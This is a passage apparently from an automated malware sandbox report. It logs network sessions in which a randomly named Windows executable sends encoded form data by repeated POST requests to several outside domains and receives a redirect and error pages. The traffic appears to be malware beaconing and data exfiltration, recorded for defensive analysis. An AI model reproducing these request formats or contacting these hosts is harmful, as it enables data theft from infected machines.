                                                                                Data Raw: 47 68 45 74 75 48 3d 76 50 4d 63 51 6b 66 68 7a 37 49 54 36 31 36 66 70 72 72 35 71 56 77 48 31 56 37 78 59 62 6a 42 32 6f 78 2f 6c 63 31 52 53 38 5a 51 4f 75 71 41 4d 6d 59 31 66 68 72 68 75 6b 66 64 33 79 4d 69 51 64 39 73 78 56 42 6e 77 4d 4f 5a 71 5a 55 50 68 5a 6d 4a 69 4b 70 72 71 54 50 70 51 6b 64 31 67 32 6b 52 43 35 35 67 7a 6a 75 36 76 63 61 4e 35 34 38 68 59 73 38 63 30 54 50 5a 31 6a 45 2f 42 37 49 34 46 48 67 64 48 31 5a 6d 7a 33 38 72 55 30 4a 72 66 7a 47 46 56 2b 4a 4f 46 61 66 44 65 34 36 51 58 31 76 72 55 43 56 41 65 61 4f 56 79 46 6f 41 76 55 59 6d 69 43 79 44 71 65 2f 69 49 61 73 68 46 50 56 4e 6f 59 52 56 4e 6e 71 57 72 77 3d 3d
                                                                                Data Ascii: GhEtuH=vPMcQkfhz7IT616fprr5qVwH1V7xYbjB2ox/lc1RS8ZQOuqAMmY1fhrhukfd3yMiQd9sxVBnwMOZqZUPhZmJiKprqTPpQkd1g2kRC55gzju6vcaN548hYs8c0TPZ1jE/B7I4FHgdH1Zmz38rU0JrfzGFV+JOFafDe46QX1vrUCVAeaOVyFoAvUYmiCyDqe/iIashFPVNoYRVNnqWrw==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.74987713.248.169.48807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:32:13.334724903 CET767OUTPOST /4azw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.remedies.pro
                                                                                Origin: http://www.remedies.pro
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.remedies.pro/4azw/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 76 50 4d 63 51 6b 66 68 7a 37 49 54 6f 47 69 66 36 61 72 35 68 56 77 49 77 56 37 78 57 37 6a 46 32 6f 39 2f 6c 5a 4e 42 52 50 39 51 58 4b 6d 41 4e 69 73 31 53 42 72 68 6b 45 66 69 36 53 4e 67 51 64 35 4b 78 55 39 6e 77 4d 4b 5a 71 64 45 50 68 4b 2b 47 77 4b 70 70 68 7a 50 52 49 45 64 31 67 32 6b 52 43 35 74 61 7a 6a 57 36 6f 74 71 4e 72 72 6b 67 52 4d 38 66 31 54 50 5a 69 54 45 37 42 37 4a 64 46 43 34 33 48 32 68 6d 7a 31 30 72 55 46 4a 6f 57 7a 47 48 62 65 49 65 46 61 58 49 62 39 65 75 53 58 32 33 53 51 30 6e 62 73 50 33 6f 6e 6b 73 78 46 67 64 6d 41 57 31 39 34 69 58 4b 62 6f 35 49 74 68 73 33 76 30 2f 41 31 4c 53 39 4c 49 6c 32 57 49 31 78 55 68 57 54 79 36 2b 69 64 4b 31 34 65 73 3d
                                                                                Data Ascii: GhEtuH=vPMcQkfhz7IToGif6ar5hVwIwV7xW7jF2o9/lZNBRP9QXKmANis1SBrhkEfi6SNgQd5KxU9nwMKZqdEPhK+GwKpphzPRIEd1g2kRC5tazjW6otqNrrkgRM8f1TPZiTE7B7JdFC43H2hmz10rUFJoWzGHbeIeFaXIb9euSX23SQ0nbsP3onksxFgdmAW194iXKbo5Iths3v0/A1LS9LIl2WI1xUhWTy6+idK14es=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.74988513.248.169.48807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:32:16.003022909 CET1780OUTPOST /4azw/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.remedies.pro
                                                                                Origin: http://www.remedies.pro
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.remedies.pro/4azw/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 76 50 4d 63 51 6b 66 68 7a 37 49 54 6f 47 69 66 36 61 72 35 68 56 77 49 77 56 37 78 57 37 6a 46 32 6f 39 2f 6c 5a 4e 42 52 50 31 51 4c 70 75 41 50 44 73 31 54 42 72 68 6f 6b 66 5a 36 53 4e 68 51 64 42 47 78 55 78 64 77 4b 57 5a 72 36 73 50 30 4c 2b 47 71 61 70 70 75 54 50 71 51 6b 63 78 67 32 55 72 43 35 39 61 7a 6a 57 36 6f 75 79 4e 6f 34 38 67 64 73 38 63 30 54 50 46 31 6a 45 44 42 37 51 67 46 43 30 4e 48 47 42 6d 7a 57 63 72 50 58 52 6f 5a 7a 47 42 4f 65 4a 62 46 61 4b 51 62 39 71 49 53 57 54 53 53 54 6b 6e 5a 37 2b 58 34 48 6b 6d 6d 6c 38 49 75 6a 36 41 79 4a 4f 54 56 70 74 4f 44 38 4e 44 79 64 51 32 45 47 36 62 33 38 35 61 75 47 45 69 31 78 39 2b 64 31 2f 78 36 34 48 71 6c 49 6f 35 6e 62 49 4e 47 49 36 52 4e 68 30 63 79 46 77 73 48 6b 4c 37 4f 6c 43 72 34 73 45 47 72 50 47 57 4b 61 44 53 32 33 37 51 6d 33 55 77 50 6f 37 59 2f 45 46 41 34 39 38 6f 33 48 6a 63 4b 38 48 49 6f 54 32 55 51 78 76 74 35 76 4e 42 39 44 69 62 37 78 41 4f 4c 48 33 75 71 54 69 33 43 79 56 36 45 32 6a [TRUNCATED]
                                                                                Data Ascii: GhEtuH=vPMcQkfhz7IToGif6ar5hVwIwV7xW7jF2o9/lZNBRP1QLpuAPDs1TBrhokfZ6SNhQdBGxUxdwKWZr6sP0L+GqappuTPqQkcxg2UrC59azjW6ouyNo48gds8c0TPF1jEDB7QgFC0NHGBmzWcrPXRoZzGBOeJbFaKQb9qISWTSSTknZ7+X4Hkmml8Iuj6AyJOTVptOD8NDydQ2EG6b385auGEi1x9+d1/x64HqlIo5nbINGI6RNh0cyFwsHkL7OlCr4sEGrPGWKaDS237Qm3UwPo7Y/EFA498o3HjcK8HIoT2UQxvt5vNB9Dib7xAOLH3uqTi3CyV6E2jloEDlHtUlP8dU5Vpa5260p0NHuzQMLmCYfZa1SMnC/IAlqi7vcUyPGjwvwCT/6XUjO1aNKjZ/fzMvxXkdqSx3X6CxyqnRcnYojmjKezz4pGkUfR4ZNKu6gWx3vMDTp2sGkNZyBcIpTMQPdHQyubgEafQ+vWohSadRJT7oFiw9sFZoyLgodfzfB5yLEwHQg9Y91p7iU/jGuGLJ6CtONJN3fTKe4M4PSbLeOhQRjALD2Ji3HE+3sLjq2C4o0pEwJCe57U85hFFZlhzlEWMKvyr6s5w+tkcW+D8F/A+d0lAy45FqoNBUWkqr+nOHyJjHQsbAvCXK7IwWMMBWqF/oFEmo5M2Kl1OzIwC4Jf+rZ+rsD8JIQ3udAuUrFSxGRVYYXTffzZoRZOTKKVCE9Segpi1qTMoM7z28OXfmq9OhaLCImW/iqTGWMZQdsc/Xj0xQWNdFVu9RmoPw+zxupMA3kyYHxFCJNuhonSwY7B5X5smVbbdJeJeoPjxuW1ajRZqKL66qUGaap8nPnWUvGvEeoHbmhWVCdYzBTRAw8p0EIRfZIdc4sLBy13iDo/912tGPKAI48MKf98T5qtxG94/D8vBQb8a9eCaLpw1nsRfa9dgGx5Ko9svXjZs0cYTmxCJMvOKv4pEPHcF9fk9XEHoy/dySjlR/gHUbiIErq [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.74989113.248.169.48807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:32:18.668330908 CET490OUTGET /4azw/?GhEtuH=iNk8TUzs4LA0xmLiyfXL0hgGjATAFsDni+5ztJ1xT71fUrCnNyUyZAqYt2rVyg4lMrt3jHF8wf6EsZ4R3qyrto5tvwrKQEVqglgZMsYf2yPShcLO5aI9UsQg5wD70CMaNZMdAFkLH0kf&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.remedies.pro
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:32:19.810862064 CET417INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Wed, 04 Dec 2024 14:32:19 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 277
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 68 45 74 75 48 3d 69 4e 6b 38 54 55 7a 73 34 4c 41 30 78 6d 4c 69 79 66 58 4c 30 68 67 47 6a 41 54 41 46 73 44 6e 69 2b 35 7a 74 4a 31 78 54 37 31 66 55 72 43 6e 4e 79 55 79 5a 41 71 59 74 32 72 56 79 67 34 6c 4d 72 74 33 6a 48 46 38 77 66 36 45 73 5a 34 52 33 71 79 72 74 6f 35 74 76 77 72 4b 51 45 56 71 67 6c 67 5a 4d 73 59 66 32 79 50 53 68 63 4c 4f 35 61 49 39 55 73 51 67 35 77 44 37 30 43 4d 61 4e 5a 4d 64 41 46 6b 4c 48 30 6b 66 26 39 68 79 3d 67 76 72 44 53 38 55 38 4f 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GhEtuH=iNk8TUzs4LA0xmLiyfXL0hgGjATAFsDni+5ztJ1xT71fUrCnNyUyZAqYt2rVyg4lMrt3jHF8wf6EsZ4R3qyrto5tvwrKQEVqglgZMsYf2yPShcLO5aI9UsQg5wD70CMaNZMdAFkLH0kf&9hy=gvrDS8U8OP"}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.74990743.199.54.158807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:32:25.275300026 CET744OUTPOST /iyce/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.327531.buzz
                                                                                Origin: http://www.327531.buzz
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.327531.buzz/iyce/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 36 76 54 70 42 4d 55 51 4d 51 72 45 73 6e 57 79 34 73 34 34 6b 33 78 46 55 7a 53 37 76 37 36 43 6a 61 44 65 36 65 73 31 4d 36 64 46 41 42 62 75 72 4b 57 4d 78 4b 52 47 37 4b 63 52 51 49 6f 4f 62 70 59 6f 67 36 75 65 32 6b 78 42 62 78 59 6d 47 61 6a 64 58 58 37 33 37 72 4b 47 73 79 4f 77 43 4e 73 76 37 42 2f 59 58 6d 73 55 59 33 69 63 42 45 39 66 76 74 5a 54 79 57 53 4f 4a 35 6a 55 52 57 55 35 43 49 66 37 33 32 76 44 67 4e 66 53 44 71 5a 4a 35 61 44 44 74 44 49 6b 4b 4d 47 72 6b 6f 31 77 32 2b 72 53 55 42 46 36 45 6d 32 58 79 55 47 53 41 53 52 55 62 52 51 34 6a 54 41 4d 61 78 34 55 36 75 47 6d 66 57 6a 59 34 5a 55 67 54 51 3d 3d
                                                                                Data Ascii: GhEtuH=6vTpBMUQMQrEsnWy4s44k3xFUzS7v76CjaDe6es1M6dFABburKWMxKRG7KcRQIoObpYog6ue2kxBbxYmGajdXX737rKGsyOwCNsv7B/YXmsUY3icBE9fvtZTyWSOJ5jURWU5CIf732vDgNfSDqZJ5aDDtDIkKMGrko1w2+rSUBF6Em2XyUGSASRUbRQ4jTAMax4U6uGmfWjY4ZUgTQ==


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.74991343.199.54.158807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:32:27.940026999 CET764OUTPOST /iyce/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.327531.buzz
                                                                                Origin: http://www.327531.buzz
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.327531.buzz/iyce/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 36 76 54 70 42 4d 55 51 4d 51 72 45 6a 6e 6d 79 37 50 51 34 7a 48 78 45 51 44 53 37 36 4c 36 38 6a 61 50 65 36 66 34 6c 50 49 70 46 4f 41 4c 75 71 49 75 4d 79 4b 52 47 6a 36 63 51 55 49 6f 46 62 70 45 61 67 36 53 65 32 67 5a 42 62 78 49 6d 47 4e 33 63 59 6e 36 52 7a 4c 4b 49 78 69 4f 77 43 4e 73 76 37 46 76 32 58 6d 6b 55 62 45 36 63 44 6d 56 51 68 4e 5a 53 31 57 53 4f 44 70 6a 59 52 57 55 2b 43 4a 44 42 33 30 58 44 67 49 7a 53 43 37 5a 49 7a 61 43 4b 69 6a 4a 53 4b 75 33 6b 2b 4c 35 73 34 39 58 4a 64 32 78 4e 42 51 33 31 6f 32 4b 2b 65 44 70 76 66 54 30 4f 30 31 64 35 59 77 38 4d 33 4d 79 48 41 68 47 79 31 4c 31 6b 46 6e 63 77 41 59 71 4f 4e 5a 55 31 42 62 4b 72 53 39 30 79 6e 4b 6f 3d
                                                                                Data Ascii: GhEtuH=6vTpBMUQMQrEjnmy7PQ4zHxEQDS76L68jaPe6f4lPIpFOALuqIuMyKRGj6cQUIoFbpEag6Se2gZBbxImGN3cYn6RzLKIxiOwCNsv7Fv2XmkUbE6cDmVQhNZS1WSODpjYRWU+CJDB30XDgIzSC7ZIzaCKijJSKu3k+L5s49XJd2xNBQ31o2K+eDpvfT0O01d5Yw8M3MyHAhGy1L1kFncwAYqONZU1BbKrS90ynKo=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.74991843.199.54.158807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:32:30.596649885 CET1777OUTPOST /iyce/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.327531.buzz
                                                                                Origin: http://www.327531.buzz
                                                                                Content-Length: 1251
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.327531.buzz/iyce/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 36 76 54 70 42 4d 55 51 4d 51 72 45 6a 6e 6d 79 37 50 51 34 7a 48 78 45 51 44 53 37 36 4c 36 38 6a 61 50 65 36 66 34 6c 50 49 78 46 4f 79 54 75 71 70 75 4d 39 71 52 47 71 61 63 64 55 49 6f 69 62 70 63 65 67 36 66 38 32 6d 64 42 61 53 51 6d 57 70 62 63 44 58 36 52 2f 72 4b 4a 73 79 50 71 43 4c 4d 6a 37 42 7a 32 58 6d 6b 55 62 46 4b 63 48 30 39 51 78 39 5a 54 79 57 54 42 4a 35 69 50 52 53 41 78 43 4a 32 6a 30 46 33 44 67 6f 6a 53 50 70 78 49 2f 61 43 49 72 7a 4a 61 4b 75 36 6b 2b 4e 64 4b 34 38 7a 76 64 78 64 4e 43 52 53 76 77 6b 57 61 45 41 6c 6c 66 43 49 33 78 6d 78 2b 42 68 63 42 39 74 57 33 46 68 32 4b 75 71 41 72 44 41 30 39 42 34 69 54 41 72 67 74 46 38 72 61 42 4a 4a 32 6a 4d 73 72 44 48 36 75 55 43 77 66 58 68 2f 50 69 38 36 38 55 45 35 6b 2f 72 39 4e 4c 78 7a 52 37 41 4e 33 41 75 4b 31 62 67 50 64 57 6d 49 2b 6c 34 32 6d 6a 39 75 6b 69 30 4e 7a 38 73 49 73 61 68 72 2f 6a 66 7a 4f 39 5a 35 68 45 50 73 37 2f 50 30 6d 39 41 72 41 6a 30 7a 52 51 4d 68 41 56 77 69 61 4f 35 79 [TRUNCATED]
                                                                                Data Ascii: GhEtuH=6vTpBMUQMQrEjnmy7PQ4zHxEQDS76L68jaPe6f4lPIxFOyTuqpuM9qRGqacdUIoibpceg6f82mdBaSQmWpbcDX6R/rKJsyPqCLMj7Bz2XmkUbFKcH09Qx9ZTyWTBJ5iPRSAxCJ2j0F3DgojSPpxI/aCIrzJaKu6k+NdK48zvdxdNCRSvwkWaEAllfCI3xmx+BhcB9tW3Fh2KuqArDA09B4iTArgtF8raBJJ2jMsrDH6uUCwfXh/Pi868UE5k/r9NLxzR7AN3AuK1bgPdWmI+l42mj9uki0Nz8sIsahr/jfzO9Z5hEPs7/P0m9ArAj0zRQMhAVwiaO5yKsM0VLhfa2Bv+2eKJpWwp4Ppba6QOPKGNUXI1W65q5/SoFXiuCVU/59IddHG7x/0bMw486ktisVH2x8MnkUTjS44dKwFbcMvBcyzBPt8r5JxqrxKpSqgLh+Yz8XOFJG8kVl24OoUw/+CRCXCnefVOTRC1XZDTbMtk+cQUOScZAeF4zUc74yIURatppOOUWAlFtTz1MXeperxWkHlzLuQllNn/S0HZt9mlwtVIPysjRlgjw62psEndEmoysHMV8P52zcnfWAbwtJ4riJ9yWGtSR0lvn2+oNYXeKuvoPZAkqHmSOFpe6+u6Alw6ifsv/6LxNp8UhkoqL0nU4St9NSfnuWYYUo/jhwri+pSaqm7qw0VbHmuZJIrMpHZE8jjo3bz6b/ElDb9kbRJ6Iw32ypY1ixY5F5t69Oln3j+p7j2JIorLM0aAfaWNwYh0NDdGtdJHd9Eep5r+nIBQaniBwhXKDdjMbx+SdkddL7CfWmvfLPentyNmjqCF9f1NV3UJIic6XDMG5cd1nMNDvJX2LfmqXh/NTzd4EZsxMCnd8u5h3z534bN1a0r3xRThGo42lKAvI+C7xFwXzG3IRNyfmjL7fbkECYvfXaGSfIoLnrbQsFGp/3w4CXpJtAkqf1aVwgdioyvfuOtyG7WvKqHDBNg9mTO9u9eJFQ/kT [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.74992443.199.54.158807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:32:33.249103069 CET489OUTGET /iyce/?9hy=gvrDS8U8OP&GhEtuH=3t7JC5hyAznKgFuU/ok1lWIiNGSssLiqmP3wqdAXOPpvMCbWrZKV3/4RkaY4Wf52BZA497amiF58UAMjS7eJfGDv95acxgS2B5U2yxi5cABrTEK2ZEsstqoE20nhTJm6WmYVOoPh7UOe HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.327531.buzz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.749980136.143.186.12807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:01.311480999 CET762OUTPOST /hxjq/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.everythlngict.org
                                                                                Origin: http://www.everythlngict.org
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.everythlngict.org/hxjq/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 4d 49 6c 49 35 34 49 41 57 57 68 7a 67 6b 74 58 61 35 39 42 54 61 77 71 37 6d 63 61 2b 5a 70 77 77 4a 35 59 51 6c 65 65 55 2b 7a 74 49 48 63 45 53 51 4c 45 78 41 6e 35 4f 79 34 46 39 6b 77 61 2f 33 4a 59 65 69 79 6c 2f 45 50 32 59 75 66 42 57 45 59 7a 4a 68 62 34 37 69 7a 43 42 63 39 63 75 77 71 70 4e 64 47 7a 54 6f 59 49 6e 6d 6b 37 4a 59 62 58 71 37 38 42 38 6a 4c 4b 54 49 57 65 6d 70 57 55 6a 48 62 58 78 70 66 79 71 75 4c 62 6d 35 77 42 68 4c 2f 72 57 6d 51 2f 64 73 70 47 37 4e 4e 35 64 2f 4c 55 65 7a 6d 37 30 79 36 44 4b 49 65 77 64 36 48 6f 31 45 55 56 77 6d 56 78 72 2f 34 64 7a 4b 6b 71 30 63 51 37 37 77 6b 51 50 51 3d 3d
                                                                                Data Ascii: GhEtuH=MIlI54IAWWhzgktXa59BTawq7mca+ZpwwJ5YQleeU+ztIHcESQLExAn5Oy4F9kwa/3JYeiyl/EP2YufBWEYzJhb47izCBc9cuwqpNdGzToYInmk7JYbXq78B8jLKTIWempWUjHbXxpfyquLbm5wBhL/rWmQ/dspG7NN5d/LUezm70y6DKIewd6Ho1EUVwmVxr/4dzKkq0cQ77wkQPQ==
                                                                                Dec 4, 2024 15:33:02.636681080 CET1236INHTTP/1.1 404
                                                                                Server: ZGS
                                                                                Date: Wed, 04 Dec 2024 14:33:02 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: zalb_8ae64e9492=346483e803ff107bf3906cbcefa288fe; Path=/
                                                                                Set-Cookie: csrfc=a28ca090-3d24-4302-b2b7-aecb5b16006b;path=/;priority=high
                                                                                Set-Cookie: _zcsr_tmp=a28ca090-3d24-4302-b2b7-aecb5b16006b;path=/;SameSite=Strict;priority=high
                                                                                Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                vary: accept-encoding
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 35 37 38 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cc 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 c8 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 89 02 49 d7 71 83 fd f7 1d 52 b2 ad 0b d5 64 7d 9a dd c0 a2 78 78 6e df 77 0e c9 26 af ee 3f dd fd fe e7 6f bf a0 42 95 6c f3 43 d2 fc 20 84 92 82 e0 cc 3c e9 41 49 14 46 15 2e c9 da 11 7c cb 95 74 50 ca 2b 45 2a b5 76 2a 4e ab 8c 3c 5e a3 8a e7 9c 31 7e d0 4f 58 a4 05 fd 42 f4 a3 ac 68 5d 13 e5 20 ef ac 4e 51 c5 c8 e6 2f 5e f0 c4 6b 9e 4f 33 8c 56 0f 48 1d 6b 30 a4 c8 a3 f2 52 09 a6 04 61 6b 47 aa 23 23 b2 20 5a 53 21 48 be 76 bc 03 d9 e6 e0 85 fc 90 e3 92 b2 e3 fa 53 4d aa 1f 3f e3 4a c6 0b df bf be f1 7d e7 ac d7 ac 3e 8d e0 b3 e5 d9 f1 e9 32 84 8f d6 e4 36 8a 62 47 6b 42 5a 93 73 8d 24 fc b8 92 08 9a df 8e 17 48 fa 95 c4 f3 79 fd d8 9f 2b b1 d8 d1 2a f6 e1 3d ea 4d d4 38 cb 68 b5 b3 cc 6c 71 fa b0 13 7c 5f 65 6e ca 19 17 f1 55 1e e9 6f 47 f1 3f 97 c7 99 e2 f5 9d 16 93 4f 13 5a 62 e4 96 fc ab 0b 09 25 58 b8 3b 81 33 0a 70 bd 65 24 57 d7 e8 [TRUNCATED]
                                                                                Data Ascii: 578X[o6~`h%+v:{%"BIqRd}xxnw&?oBlC <AIF.|tP+E*v*N<^1~OXBh] NQ/^kO3VHk0RakG## ZS!HvSM?J}>26bGkBZs$Hy+*=M8hlq|_enUoG?OZb%X;3pe$W*0Csx 2b}38=}i5.~DxmAPqEiul"xhiU3Ou.?;3\dD=z;1"f_&BQp d&_9XH0:eo_Bt1ai\hs3[MvBpQATv+f2Li})FeSB 46sKX]'OD^jeUi&gro{Q!
                                                                                Dec 4, 2024 15:33:02.636749029 CET732INData Raw: 53 c4 9a 0a 2c 9c 82 4b 17 f9 f7 c0 f1 22 50 9f cb f7 ac 11 80 7d f6 69 3a 27 30 db dd e4 ba cb 33 ae 9b 66 d3 69 06 1a da ee a3 7b f8 7d 34 b5 de ac a6 55 ce 27 ca c4 24 7c 31 5d 6a e7 f5 88 51 34 d4 d1 85 fd e6 1b 90 69 b6 02 6e 83 69 46 25 ac
                                                                                Data Ascii: S,K"P}i:'03fi{}4U'$|1]jQ4iniF%HoE^@%9dY-phmrQY3D2>|qMqCK9mwqzmtK(9t8jJIz?f;li9T`-I{`yH<|$v[F


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.749985136.143.186.12807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:04.017218113 CET782OUTPOST /hxjq/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.everythlngict.org
                                                                                Origin: http://www.everythlngict.org
                                                                                Content-Length: 239
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
